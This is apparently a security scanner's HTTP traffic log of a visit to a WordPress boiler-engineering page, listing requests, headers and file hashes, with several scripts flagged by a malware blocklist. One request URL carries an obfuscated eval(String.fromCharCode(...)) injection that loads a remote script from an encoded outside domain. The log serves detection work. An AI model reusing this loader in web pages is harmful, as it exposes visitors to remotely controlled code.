referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with very long lines (30449)
Size:   6913
Md5:    46a868d47ad97532f60a1419dd340564
Sha1:   726581d97c75b3770c19eade6431ccd14998bed8
Sha256: 4b5980de529a061954353b1d5e52e98902de5cad7c9c167150bad1b67d40ef98

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.3 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/x-javascript
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:39 GMT
last-modified: Mon, 01 Jul 2019 18:27:38 GMT
etag: "3868-5d1a509a-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 3993
date: Tue, 27 Sep 2022 06:18:39 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text
Size:   3993
Md5:    a975a254fbc49a0086a84e624d7f094c
Sha1:   04885e648587650d8782310a9e8056191dbe5411
Sha256: 5033a9e7cefd80eda6878d4fe33c7e3a59f2da9e06a7a74d44961a9d8de4ee20

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/x-javascript
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:39 GMT
last-modified: Thu, 10 Mar 2022 19:31:33 GMT
etag: "736-622a5215-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 977
date: Tue, 27 Sep 2022 06:18:39 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with very long lines (1680)
Size:   977
Md5:    60e4ab71992dc241e8f93bdf73199d7c
Sha1:   61fe2f1b6151b2c400f0b32998ce1504cdf2140a
Sha256: eae30f24f574269c25ef73f888c3513259a8ea233be7cb25166bbc017e8318f0

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.6.7 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/x-javascript
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:39 GMT
last-modified: Thu, 10 Mar 2022 19:31:30 GMT
etag: "5c0-622a5212-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 617
date: Tue, 27 Sep 2022 06:18:39 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with very long lines (1472), with no line terminators
Size:   617
Md5:    2fbb48d9527fa1e38e0bda684e03b478
Sha1:   f5489d09ca4aaaeaac0a601938059dd782043ef8
Sha256: dc716cc91b204432d809768b298d044089c0ec796cebf4bbaf28a7f3704ea948

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.6.7 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/x-javascript
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:39 GMT
last-modified: Thu, 10 Mar 2022 19:31:30 GMT
etag: "b7c-622a5212-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 1040
date: Tue, 27 Sep 2022 06:18:39 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with very long lines (2940), with no line terminators
Size:   1040
Md5:    39463ba25159d96f7ac01a34f6df86df
Sha1:   0e24012f7c10c1de4ed82a1e16dc0908e505cac7
Sha256: c5e652e240d2ea0982ea9978a274e3416a574cc82f8a8d31806e64a9fbc92b1d

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 27 Sep 2022 06:18:40 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 27 Sep 2022 06:18:40 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /s/montserrat/v25/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://biasbd.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.163
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 30928
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Thu, 22 Sep 2022 16:40:18 GMT
expires: Fri, 22 Sep 2023 16:40:18 GMT
cache-control: public, max-age=31536000
age: 394702
last-modified: Mon, 11 Jul 2022 18:57:39 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 30928, version 1.0\012- data
Size:   30928
Md5:    ac0d2859ea5f8fd6bcb3c305c08ec184
Sha1:   7f6c17e3e592cd8bd346b9cc261d8dd961b8aef7
Sha256: ae919a7c9f25f0fd97fc18e398ae8e453fcaae487e4a4cb4f896e7fecde4a780
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 27 Sep 2022 06:18:40 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 27 Sep 2022 06:18:40 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 27 Sep 2022 06:18:40 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /wp-content/themes/industrial/js/countto.js?ver=5.2.16 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/x-javascript
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:39 GMT
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "a15-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 915
date: Tue, 27 Sep 2022 06:18:39 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   915
Md5:    ec069ca5933f06f20307ef566ae76cc2
Sha1:   bb8ad86a394e5dad5af04050a3313cc3838072b5
Sha256: 7c32680bb0afa1ba5219d23cb46e73df4a41196c3dcaa4cd629dc61e31fb8ee4
                                        
                                            GET /s/ptsans/v17/jizaRExUiTo99u79D0KExQ.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://biasbd.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.163
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 45300
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 21 Sep 2022 19:27:53 GMT
expires: Thu, 21 Sep 2023 19:27:53 GMT
cache-control: public, max-age=31536000
age: 471047
last-modified: Wed, 27 Apr 2022 16:11:08 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 45300, version 1.0\012- data
Size:   45300
Md5:    5fe660c3a23b871807b0e1d3ee973d23
Sha1:   62a9dd423b30b6ee3ab3dd40d573545d579af10a
Sha256: e13ffa988be59cbf299d7ff68f019f902b60848203ac4990819eb7e4624ee52d
                                        
                                            GET /wp-content/uploads/Fire-Tube-Boiler.jpg HTTP/1.1 
Host: www.elprocus.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         206.189.131.248
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
date: Tue, 27 Sep 2022 06:18:39 GMT
content-length: 8816
last-modified: Thu, 13 Dec 2018 06:48:36 GMT
etag: "5c1200c4-2270"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 259x194, components 3\012- data
Size:   8816
Md5:    b83fa9bcce25cf71d95ca05db01e23b5
Sha1:   ca7dbec2a32ade033f1a3e9c540bfe2ff16e54f6
Sha256: 904b0ac25c0c0a4d499ae0573af5a35ae126db5707731132979a68bfd4b274dd
                                        
                                            GET /wp-content/uploads/Fire-Tube-Boiler-Diagram-300x167.gif HTTP/1.1 
Host: www.elprocus.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         206.189.131.248
HTTP/2 200 OK
content-type: image/gif
                                        
server: nginx
date: Tue, 27 Sep 2022 06:18:39 GMT
content-length: 22950
last-modified: Thu, 13 Dec 2018 06:50:55 GMT
etag: "5c12014f-59a6"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 87a, 300 x 167\012- data
Size:   22950
Md5:    4c3eeaad311bbde2127368eb5f9389a1
Sha1:   8e3c405b1cae4a2c22fe4502c8a679dff5efdd41
Sha256: b565f8548e72c40c3eb4759350b33d5ffdf3fdb29bd8a32119dcfa1aeae84141
                                        
                                            GET /s/ptsans/v17/jizfRExUiTo99u79B_mh0O6tLQ.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://biasbd.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.163
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 47048
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 21 Sep 2022 19:27:54 GMT
expires: Thu, 21 Sep 2023 19:27:54 GMT
cache-control: public, max-age=31536000
age: 471046
last-modified: Wed, 27 Apr 2022 16:55:54 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 47048, version 1.0\012- data
Size:   47048
Md5:    87a1556b696ae2cb1a726bd8c4584a2f
Sha1:   1be0f6f39e0cf316f9827f945eeeaef8294cc37b
Sha256: 141f0c53e457585d4ac7426eb3d757666d250ee6fbf0e9c0878128e4c627f0b1
                                        
                                            GET /wp-content/uploads/Vertical-Fire-Tube-Boiler.jpg HTTP/1.1 
Host: www.elprocus.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         206.189.131.248
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
date: Tue, 27 Sep 2022 06:18:39 GMT
content-length: 7864
last-modified: Thu, 13 Dec 2018 06:54:20 GMT
etag: "5c12021c-1eb8"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 195x259, components 3\012- data
Size:   7864
Md5:    0cd15aa3fb5c5834a420864d5d7ce2f6
Sha1:   67d40f872c2b4045a427d03f278f40788eee2d34
Sha256: 728e43429ee7009ebf111b0a6a64063efba11eaf01dacbf52f9ad848f233f2cc
                                        
                                            GET /css?family=Montserrat%3A400italic%2C400%2C600%2C700%2C300&subset=latin%2Clatin-ext&ver=5.2.16 HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Tue, 27 Sep 2022 06:18:38 GMT
date: Tue, 27 Sep 2022 06:18:38 GMT
cache-control: private, max-age=86400
cross-origin-opener-policy: same-origin-allow-popups
cross-origin-resource-policy: cross-origin
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   43159
Md5:    76d376802a6e66f69da0ea5563b14ce3
Sha1:   de6053596fdbe0c212700308b5d58b46967fc92f
Sha256: f2128da7cc3b49ec77598cda56dc78c63b5991e2ccd7b8a9b3ac01f9b6f4df91
                                        
                                            GET /wp-content/uploads/Locomotive-Fire-Tube-Boiler.png HTTP/1.1 
Host: www.elprocus.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         206.189.131.248
HTTP/2 200 OK
content-type: image/png
                                        
server: nginx
date: Tue, 27 Sep 2022 06:18:39 GMT
content-length: 6210
last-modified: Thu, 13 Dec 2018 06:53:51 GMT
etag: "5c1201ff-1842"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 275 x 184, 8-bit colormap, non-interlaced\012- data
Size:   6210
Md5:    0a4b19d8c8c5a6ec930d552b41912f87
Sha1:   87a0076770024920ceb73203e2f2cd36fa890a94
Sha256: bea26b8236924374c01dcbaf0f150c5cabd79dca7e8918e02a268417bb1e609b
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 27 Sep 2022 06:18:40 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js HTTP/1.1 
Host: static.zotabox.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://biasbd.com/

                                         
                                         104.22.55.216
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
                                        
Date: Tue, 27 Sep 2022 06:18:40 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: Zotabox
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST
Content-Security-Policy: default-src 'none'
X-Content-Type-Options: nosniff
Content-Encoding: gzip
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 75121f8fab01fab4-OSL


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (2986)
Size:   764
Md5:    e0b278a03f3c0916a366ea6e39a232c7
Sha1:   c383e5fa69a1cf6016560cb0aa9f17be5b699bea
Sha256: 22d617e43c0296250a3e4b524c3672329157563a5b5f065f4f7d0e8b5ea78e40
                                        
                                            GET /wp-includes/js/dist/vendor/moment.min.js?ver=2.22.2 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/x-javascript
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:40 GMT
last-modified: Fri, 19 Oct 2018 04:06:46 GMT
etag: "c9df-5bc95856-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 16894
date: Tue, 27 Sep 2022 06:18:40 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with very long lines (51679), with no line terminators
Size:   16894
Md5:    1fbbbdae15d9c0ba5857b2791ce71a66
Sha1:   814338d39879435491748ebee1cb66674d2010fd
Sha256: 5b4e060984605187cc4b5f653a80c521ca9a74dd6e22249539456b7bf2c43327

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/industrial/js/pikaday.js?ver=5.2.16 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
